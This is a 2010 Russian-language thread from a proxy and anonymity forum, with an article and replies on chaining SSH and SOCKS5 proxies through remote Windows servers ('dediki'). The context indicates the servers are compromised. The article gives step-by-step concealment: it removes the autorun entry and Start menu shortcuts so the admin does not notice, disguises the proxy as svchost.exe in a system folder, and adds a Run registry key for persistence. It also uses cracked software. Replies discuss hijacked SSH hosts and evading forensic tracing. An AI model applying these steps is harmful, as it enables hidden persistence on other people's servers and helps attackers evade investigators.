[Статья] Поднимаем DualSSH - Страница 2 - Proxy-Base Community - Анонимность и безопасность в интернете.

Private Proxy Tools [купить доступ]:
Proxy Checker [old] | Proxy Checker [new] | Url Proxy Parser | Multi Proxy Parser
Alive Proxy List (URL, ip:port\n) (~ http/s>=1000, socks4/5>=100) | Proxy List
Free Socks 4/5 (Alive) | Proxy Gear Pro (Proxy Combine: checker, parser, grabber)

 



Информация по хайдам / репутации

Все инфопродукты и приватная информация бесплатно
Абузоустойчивые (bulletproof) VPS/VDS -elitevps.io- под все Ваши проекты!

Вернуться   Proxy-Base Community - Анонимность и безопасность в интернете. > Proxy-Base - Information > Наши проекты, статьи, релизы

Ответ
 
LinkBack Опции темы Поиск в этой теме Опции просмотра
Старый 24.03.2010, 16:19   #1 (permalink)
***VIP***
Гарант
 
Аватар для ImPuls
 
Регистрация: 11.05.2009
Адрес: root@world:~#
Сообщений: 809
Member ID: 5

Репутация: 4240
Репутация: 4240
Сказал(а) спасибо: 1,700
Поблагодарили 1,885 раз(а) в 681 сообщениях
Топикстартер (автор темы) По умолчанию [Статья] Поднимаем DualSSH

Поднимаем DualSSH

SSH (англ. Secure SHell — «безопасная оболочка») — сетевой протокол сеансового уровня, позволяющий производить удалённое управление операционной системой и туннелирование TCP-соединений (например, для передачи файлов). Сходен по функциональности с протоколами Telnet и rlogin, но, в отличие от них, шифрует весь трафик, включая и передаваемые пароли. SSH допускает выбор различных алгоритмов шифрования.


В данной статье описывается способ поднятия
SSH сервера и socks5-прокси с авторизацией,
в совокупности получается полноценный SSH-туннелинг.
В логах у провайдера будет с вашего ip адреса
подключение к одному ip-адресу, но работать вы будете
совершенно с другого ip-адреса, ни со своего, ни с серверного.


Внимание!
Если Вы не уверенны в своих действиях, или у Вас руки не из того места (прости господи), операции, описанные в статье, делать не рекомендуется!
Внимание!
Данная статья написана в ознакомительных целях, автор ответственности за незаконное использование материалов из данной статьи не несёт.


Для приготовления DualSSH нам потребуется:
1) 1 дедик (Windows Server 2003 как вариант) с прямым ip-адресом, неплохой скоростью (10\10 мб\с вполне сойдёт), высоким аптаймом, с отсутствием (или тупым) админом, и самое главное - находящийся за пределами Вашей страны.
2) 1 дедик (как и Windows Server 2003, так и Windows XP подходят) для поднятия socks5-прокси с авторизацией (желательно что бы он находился в той же стране что и первый дедик, так же желательно что бы был с прямым ip, или как будет описанно в статье, никакого НАТа).
3) Программа WinSSHD (или аналоги, но я предпочёл остановиться именно на этой) для поднятия SSH сервера на дедике (взять её можно на официальном сайте)
4) Socks5 прокси-сервер с авторизацией (для упрощения поиска собран и приаттачен к статье простенький сервер)
5) Proxifier 2.9 и Entunnel (вместе с кряком залит в аттач)


Итак, приступим к приготовлению DualSSH:


Этап I
Подключаемся к дедику, это я надеюсь все умеют , скачиваем WinSSHD на дедик, и начинаем устанавливать ......



Ставим галочку на "I agree to accept all the terms of this License Agreement"
Изменяем путь установки (ведь никто не хочет инсталить в дефаултную папку? )
И жмём "Install" .... Дальше выскочит табличка, какой тип версии Standart edition или Personal edition .... Выбираем Personal edition, жмём ок .... дальше выскакивает сообщение, что бы Вы ввели данные (тут все разберуться что и куда вводить, я ввёл David J. Jackson), и продолжаем установку ......

Дальше, по окончании установки, запускается панель управления WinSSHD .... что тут нужно сделать, смотрим скрины .......

Порт выставляем - 22 ... хотя, и так, в первой вкладке стоят уже нужные настройки:



Переходим во вторую вкладку (Windows account), тут содержаться учётки для доступа к SSH, так как используються учётные записи Windows, то рекомендую создать обычную учётную запись (с правами юзер, неограниченным действием пароля), к примеру, логин - ssh_user, пароль - ssh_pass, и добавляем её в учётные записи для доступа к SSH:



После этого жмём на Ok и переходим к дальнейшим настройкам SSH сервера ....
В панели управления WinSSHD находим Settings -> Edit advanced settings , и переходим в пункт Logging, и выставляем настройки как на скриншоте:



И жмём Ок ....

Настройка SSH сервера почти завершена, осталивь лишь маленькие штрихи:

1) WinSSHD автоматически загружается при логоне в систему, поэтому что бы не спалил админ убираем автозагрузку ...
выполняем: пуск -> выполнить -> regedit
Идём в секцию
Код:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
И находим там значение с автозапуском WinSSHD
Код:
Persistent WinSSHD Control Panel "C:\WINDOWS\addins\ssh\sshdctrl.exe" -startMinimized
(может немного отличаться, смотря куда установите WinSSHD)
И успешно его удаляем

2) Поскольку WinSSHD работает как служба, он присутствует ещё в пуск -> программы и пуск -> панель управления -> администрирование

Из этих двух каталогов успешно удаляем ярлыки\папки которые палят наш софт

(насчёт скрытия WinSSHD в установленных программах не знаю, будет ли после этого работать)

Всё, теперь можем смело открывать панель управления WinSSHD и запускать сервер (думаю, разберётесь где запускать)


Этап II
Теперь, после запуска сервера WinSSHD можно успешно сворачивать\закрывать подключение к первому дедику .... далее нам нужно наладить клиентскую часть SSH, для этого будем использовать программу Entunnel ставиться она на Ваш компьютер.

После установки Entunnel и кряка, запускаем Entunnel, жмём на кнопочку "Create a new session" , вписываем данные как показанно на скрине ниже:


Примечание: Пароль для доступа к SSH серверу вводить пока что ненадо!

Пока что настройка Entunnel завершенна, жмём на Ок, выбираем подключение SSH (или как вы его назвали) и жмём "Connect" , если всё правильно настроенно, то произайдёт авторизация на сервере SSH, и выскочит сообщение, жмём на среднюю кнопку, вводим пароль юзера SSH сервера и ставим галочку на "Save password" если это необходимо, и жмём "Ок" , должно получиться вот так:



Теперь можем облегчённо вздохнуть, половина дела сделана

Этап III
Теперь нам нужно настроить socks5 прокси-сервер с авторизацией
Тут достаточно просто всё, заливаем архив из аттача на 2-ой дедик, и приступаем к настройке ......
Разархивируем архив в папку на дедике:
Код:
C:\WINDOWS\system
(Можете любую другую использовать, но скрытную от глаз админа )
Видим 3 файла:
Start.bat - служит для разового запуска сокс-прокси (после запуска start.bat удаляем за ненадобностью, а можно и оставить, на ваше усмотрение)
Socks.reg - файл для регистриции сокса в реестре (служит для автозапуска, так же после импортировании данных в реестр можно удалить)
svchost.exe - сам файл socks5 прокси

Приступаем к процедуре настройки .... для начала выполняем:
пуск -> выполнить -> cmd -> ipconfig

Если видими что существует только 1 подключение и в нём присутствует ip адрес дедика, то ключ -b в настройке и запуске socks5 прокси можно не использовать, а если же видим примерно такое:
Код:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Documents and Settings\Admin>ipconfig

Настройка протокола IP для Windows


Локалка - Ethernet адаптер:

        DNS-суффикс этого подключения . . :
        IP-адрес  . . . . . . . . . . . . : 10.0.230.10
        Маска подсети . . . . . . . . . . : 255.255.255.192
        Основной шлюз . . . . . . . . . . : 10.0.110.1

Интернет - PPP адаптер:

        DNS-суффикс этого подключения . . :
        IP-адрес  . . . . . . . . . . . . : 82.140.126.15
        Маска подсети . . . . . . . . . . : 255.255.255.255
        Основной шлюз . . . . . . . . . . : 82.140.126.10

C:\Documents and Settings\Admin>
но там присутствует ip дедика, то ключ -b использовать нужно.

Ну чтож, начнём сначала с редактирования Start.bat , открываем его блокнотом, и видим:
Код:
svchost.exe -p 1080 -user admin -pass password -b 127.0.0.1
Где:
ключ -p отвечает за порт
ключ -user отвечает за логин юзера прокси
ключ -pass отвечает за пароль юзера прокси
ключ -b отвечает на какой ip биндить socks5-прокси (для второго варианта)

к примеру, я хочу сделать прокси сервер на порте 51510, с логином PrOxY, и паролем TeSt, и у меня дедик с 2-ым примером подключения (где несколько подключений к компьютеру, но среди них присутствует ip адрес дедика), соответственно у меня получиться строчка:
Код:
svchost.exe -p 51510 -user PrOxY -pass TeSt -b 82.140.126.15
эту строчку сохраняем в Start.bat ...

Открываем в текстовом документе Socks.reg, и видим там следующее:
Код:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\\Windows\\svchost.exe"
тут нас будет интересовать только:
Код:
"svchost"="C:\\Windows\\svchost.exe"
Вспоминаем в какую же папочку мы запихнули socks5-прокси, ах да ... в C:\WINDOWS\system .... но тут нам так же понадобятся ключи из файла Start.bat ..... получается такое:
Код:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\\WINDOWS\\system\\svchost.exe -p 51510 -user PrOxY -pass TeSt -b 82.140.126.15"
И сохраняем всё это в Socks.reg .....

Ну что, вроде бы всё готово? Тогда запускаем Start.bat .... появляется окно cmd c запуском socks5-прокси с ключами, если cmd сразу же закрывается, значит что то Вы не так сделали, перечитываем ещё раз этап 3, а если же появилось окно cmd и не закрылось, то значит всё упешно запущенно, тогда можете смело зыкрывать Start.bat , и импортировать в реестр данные из Socks.reg (двойным кликом кликнуть на Socks.reg и нажать "Ок") ..... после этой процедуры можно удалить Start.bat и Socks.reg ....

Надеюсь Вы куда нибуть записали или запомнили логин и пароль от socks5-прокси

Этап IV

Ну чтож, у нас есть почти всё осталось только донастроить Entunnel и поставить Proxifire 2.9

По порядку ... заходим в Entunnel, 2 раза кликаем на подключении SSH (или как Вы назвали подключение), и заходим в настройки "Port Forwarding" ... жмём "Add" и настраиваем всё как на скрине:



Теперь осталось установить Proxifire 2.9 (я думаю процесс установки описывать ненада)
... После установки, запускаем Proxifier, жмём:
Настройка -> Настройки прокси ....
Жмём на кнокочку "Добавить" и делаем всё как на скрине:



Внимание! Тут нужно вводить логин и пасс от socks5-сервера!

Жмём "Ок"

И проверяем, открываем браузер, и переходим на 2ip.ru .... если страница загрузилась, и показывае ip-адрес socks5-прокси, то Вы всё правильно сделали, если же ничего не грузиться, Вы где то допустили ошибку....

Рекомендация: поверх dualssh лучше всего вешать ещё проксю (хттп, сокс4, сокс5) из паблика, предварительно отобрав самую быструю

(C) ImPuls for Proxy-Base.Org

Thank: ReisendeR за руссификацию Proxifire 2.9

Копирование статьи без ведома автора запрещено.
Вложения
Тип файла: zip socks5.zip (25.5 Кб, 333 просмотров)
Тип файла: zip entunel.zip (2.36 Мб, 194 просмотров)

Последний раз редактировалось ImPuls; 26.06.2010 в 17:31.
ImPuls вне форума   Ответить с цитированием
Старый 26.03.2010, 15:53   #10 (permalink)
BBC
Твой друг
 
Регистрация: 20.05.2009
Адрес: proxy-base.org
Сообщений: 390
Member ID: 173

Репутация: 401
Репутация: 401
Сказал(а) спасибо: 429
Поблагодарили 284 раз(а) в 160 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

Мего-статья!
__________________
Если ты нажмешь кнопку "спасибо" под этим сообщением, то ты сильно об этом пожалеешь. Лучше даже не пробуй.
Все прокси проверены при помощи DiChecker
Все деды сбручены с помощью RDP Brute
Хочешь найти все мои сообщения? Тыкай сюда

Спамеры- мои враги.
BBC
BBC вне форума   Ответить с цитированием
Старый 27.03.2010, 12:44   #11 (permalink)
HTTP/S
 
Регистрация: 13.02.2010
Сообщений: 61
Member ID: 6564

Репутация: 44
Репутация: 44
Сказал(а) спасибо: 29
Поблагодарили 32 раз(а) в 21 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

ImPuls, от Тебя - конечно интересно
DrakonHaSh вне форума   Ответить с цитированием
Старый 02.04.2010, 12:52   #12 (permalink)
HTTP/S
 
Регистрация: 14.06.2009
Сообщений: 59
Member ID: 620

Репутация: 121
Репутация: 121
Сказал(а) спасибо: 1
Поблагодарили 53 раз(а) в 15 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

а можно для этого юзать ломаные ssh? если стоить openvpn
GROM вне форума   Ответить с цитированием
Старый 09.04.2010, 12:06   #13 (permalink)
***VIP***
Гарант
 
Аватар для ImPuls
 
Регистрация: 11.05.2009
Адрес: root@world:~#
Сообщений: 809
Member ID: 5

Репутация: 4240
Репутация: 4240
Сказал(а) спасибо: 1,700
Поблагодарили 1,885 раз(а) в 681 сообщениях
Топикстартер (автор темы) По умолчанию Re: [Статья] Поднимаем DualSSH

GROM, можно конечно, только если до ssh в цепочке будет стоять что нибуть (к примеру vpn), иначе в логах ssh ломанного засветишь ип
ImPuls вне форума   Ответить с цитированием
Старый 09.04.2010, 21:12   #14 (permalink)
HTTP/S
 
Регистрация: 14.06.2009
Сообщений: 59
Member ID: 620

Репутация: 121
Репутация: 121
Сказал(а) спасибо: 1
Поблагодарили 53 раз(а) в 15 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

запущен openvpn конекчюсь к взломаному ssh ддальше socks5 на деде. вроде рабоатет. на ssh светится ип впН?
GROM вне форума   Ответить с цитированием
Старый 09.04.2010, 21:56   #15 (permalink)
Suspended
 
Аватар для Kuzia
 
Регистрация: 17.05.2009
Сообщений: 1,702
Member ID: 126
ICQ 296367

Репутация: 1576
Репутация: 1576
Сказал(а) спасибо: 1,214
Поблагодарили 1,337 раз(а) в 798 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

GROM, поидее да, в логах Windows.

Вообще у нас с ImPulsом разговор был о том чтобы заменить сокс на ssl прокси. По сути еще одна рюшечка. Кого-то может и устроит сокс, ну лишний уровень безопастности думаю не будет лишним.

Поднял данную связку, прикинул на счет канала деда. Если не хотите терять скорость, поднимайте прокси на деде с хорошим каналом, поближе к вам (Ближайшая европа, Польша, Чехия, Турция, etc.), а ssh сервер на деде с пропускной способностью (инет\~8) равной или больше вашего канала. Тогда практически не будет потери скорости.

Смотрите не загруженность канала деда, подняв ssh серв на деде с каналом 15\10 я был "приятно" удивлен скорости в 0.6\0.4 мб, долго ломал голову почему? как так? Ведь 15 метров! Оказалось на дедике держат какой-то sql сервер, который принимает запросы от 400-600 адресов раз в пять секунд. Иными словами канал забит под завязку...
__________________
[SIGPIC][/SIGPIC]
Теперь на WordPress!

Не отвечаю на глупые вопросы в лс и icq. Если вы мне пишите, соблюдайте хотя бы элементарные правила хорошего тона.

Ваше право на собственное мнение вовсе не обязывает меня слушать бред!
Kuzia вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 20.04.2010, 01:19   #16 (permalink)
HTTP
 
Регистрация: 19.04.2010
Сообщений: 6
Member ID: 7479

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

Цитата:
Сообщение от DrakonHaSh
просто надо поискать в "секретных" логах пакеты похожие на те, что пришли на жертву.
а если это будет собственноручно поднятая прокся, на приличном деде (чтобы юзеров поболе было)
выкинуть в паблик
тока надо чтобы все подключенные юзеры получали аналогичные пакеты что и ты(от твоей жертвы), в нагрузку к своим
тогда искателям придется отрабатывать всех подключенных в определенное время

Последний раз редактировалось exeler0; 20.04.2010 в 01:26.
exeler0 вне форума   Ответить с цитированием
Старый 20.04.2010, 12:41   #17 (permalink)
Suspended
 
Аватар для Kuzia
 
Регистрация: 17.05.2009
Сообщений: 1,702
Member ID: 126
ICQ 296367

Репутация: 1576
Репутация: 1576
Сказал(а) спасибо: 1,214
Поблагодарили 1,337 раз(а) в 798 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

exeler0, зачем столько геморроя? паблик соксу прикрутить с наименьшим таймаутом вот и все
__________________
[SIGPIC][/SIGPIC]
Теперь на WordPress!

Не отвечаю на глупые вопросы в лс и icq. Если вы мне пишите, соблюдайте хотя бы элементарные правила хорошего тона.

Ваше право на собственное мнение вовсе не обязывает меня слушать бред!
Kuzia вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 12.05.2010, 17:57   #18 (permalink)
HTTP/S
 
Регистрация: 01.10.2009
Сообщений: 45
Member ID: 3801

Репутация: 5
Репутация: 5
Сказал(а) спасибо: 3
Поблагодарили 3 раз(а) в 3 сообщениях
По умолчанию Re: [Статья] Поднимаем DualSSH

спасибо за сокс5 с авторизацией в комплекте, есть трабла сокс падает через несколько минут после использования в паблике есть хотябы 1 нормальный socks5 сервер чтоб хотябы нормально работал в НАТ на XP и 2003?
r3l4x вне форума   Ответить с цитированием
Ответ

Метки
dualssh, dualssh в windows, ssh туннелирование, ssh-туннель, анонимность в сети, безопасность в сети, настройка dualssh

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[СТАТЬЯ] На дедике не работает JavaScript Kuzia Работа с дедиками 4 01.02.2010 17:19
Статья: Угон дедиков [ipscan+ntscan] ImPuls Брут дедиков, способы брута, нужный софт 5 07.06.2009 11:23
Статья Autorun.inf и его возможности †Be@®† Системы и сети, взлом и защита, анонимность в сети 0 14.05.2009 20:37
[Статья] Делаем online магазин KeNtAvRrr Флейм 0 13.05.2009 18:34




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.